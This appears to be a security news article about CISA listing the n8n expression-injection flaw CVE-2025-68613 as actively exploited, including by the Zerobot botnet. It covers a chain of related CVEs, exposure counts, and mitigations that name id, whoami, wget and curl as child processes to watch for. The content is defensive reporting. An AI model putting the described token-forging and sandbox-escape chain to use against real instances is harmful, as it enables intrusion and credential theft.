The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution vulnerability in the n8n workflow automation platform to its Known Exploited Vulnerabilities (KEV) catalog, citing confirmed active exploitation by threat actors including the Zerobot botnet.
Background
n8n is a widely deployed open-source workflow automation platform used by enterprises and development teams to orchestrate integrations across cloud services, internal APIs, and third-party SaaS applications. According to Resecurity, the platform supports over 400 integrations to third-party solutions, positioning it as a central orchestration layer in many enterprise environments. That connectivity, while operationally valuable, means a compromised n8n instance can serve as a launchpad for lateral movement into adjacent systems.
CVE-2025-68613, carrying a CVSS score of 9.9, was first disclosed in a December 19, 2025 n8n security advisory. The flaw resides in the platform's server-side expression evaluation engine. Exploitation requires authentication but no elevated privileges beyond those needed for workflow creation or editing-a permission level commonly granted to developers, DevOps engineers, and integration partners. Attackers supply malicious JavaScript expressions inside workflow definitions that escape the intended sandbox and execute arbitrary code with the privileges of the n8n process, according to Orca Security.
Details
CISA added CVE-2025-68613 to its KEV catalog on March 11, 2026, setting a remediation deadline of March 25, 2026, for Federal Civilian Executive Branch (FCEB) agencies under Binding Operational Directive BOD 22-01. CVE-2025-68613 is the first n8n vulnerability to be placed in the KEV catalog, according to The Hacker News.
Intel 471 researchers identified the first confirmed in-the-wild exploitation in mid-January 2026. Active exploitation was first observed when Akamai's security intelligence and response team detected the Zerobot botnet-a Mirai-based botnet typically targeting IoT devices-leveraging CVE-2025-68613 to compromise n8n instances. Intel 471's Vulnerability Intelligence team also observed a publicly available Metasploit module for CVE-2025-68613, indicating the vulnerability has been weaponized and productized. The firm additionally noted that "multiple threat actors, including a possible ransomware operator," shared links to a working exploit.
The exposure surface remains substantial. Intel 471 observed 71,537 exposed n8n instances worldwide as of March 16, 2026. The authentication barrier that CVE-2025-68613 nominally requires can be bypassed by chaining it with a second critical flaw. CVE-2026-21858, dubbed "Ni8mare" by its finders at Cyera, carries a maximum CVSS score of 10.0 and allows unauthenticated file read via improper webhook request handling, according to Rapid7. By exploiting the unauthenticated path first to forge an administrator session token, attackers can then trigger the authenticated RCE without valid credentials.
Researchers have identified five CVEs in the n8n exploit chain. Beyond CVE-2025-68613 and CVE-2026-21858, the chain includes CVE-2025-68668 (arbitrary command execution via the Pyodide Python code node, CVSS 9.9), CVE-2025-68697 (arbitrary file read/write in legacy JavaScript execution mode), and CVE-2026-21877 (RCE via arbitrary file write, CVSS 9.9), per Rapid7's analysis. Pillar Security subsequently disclosed CVE-2026-27577 (CVSS 9.4), classified as additional exploits discovered in the workflow expression evaluation system following CVE-2025-68613.
Upon successful exploitation, attackers can execute arbitrary OS commands, extract API keys, OAuth tokens, and database credentials stored in workflow environment variables, write backdoors to disk, and pivot laterally into connected databases, CI/CD pipelines, and cloud infrastructure, according to SecureLayer7. CISA described the core flaw as "improper control of dynamically managed code resources vulnerability in its workflow expression evaluation system" in its KEV entry.
A significant share of exposed deployments are self-hosted instances that lag in patch adoption. Self-hosted n8n deployments via Docker or virtual machine installs frequently lack consistent patch pipelines, and operational hesitation-including concern over breaking production workflows-has slowed remediation, according to Vulert's analysis of the exposure data. n8n's cloud customers received automatic updates shortly after patches were released.
Outlook
N8n patched CVE-2025-68613 in versions 1.120.4, 1.121.1, and 1.122.0, released in December 2025. Security teams managing self-hosted deployments should treat workflow automation infrastructure with the same patch urgency as perimeter systems. Recommended mitigations from CISA, Rapid7, and Resecurity include:
- Restricting workflow creation and editing permissions to a minimal set of trusted users
- Enforcing multi-factor authentication and single sign-on (SSO) across n8n instances
- Deploying the platform in network-isolated segments with least-privilege OS accounts
- Enabling runtime monitoring for anomalous child process spawns-particularly commands such as
id,whoami,wget, andcurl-originating from the n8n process
Intel 471 recommends organizations also integrate available Sigma detection rules and Nuclei templates to identify exploitation attempts across their environments.
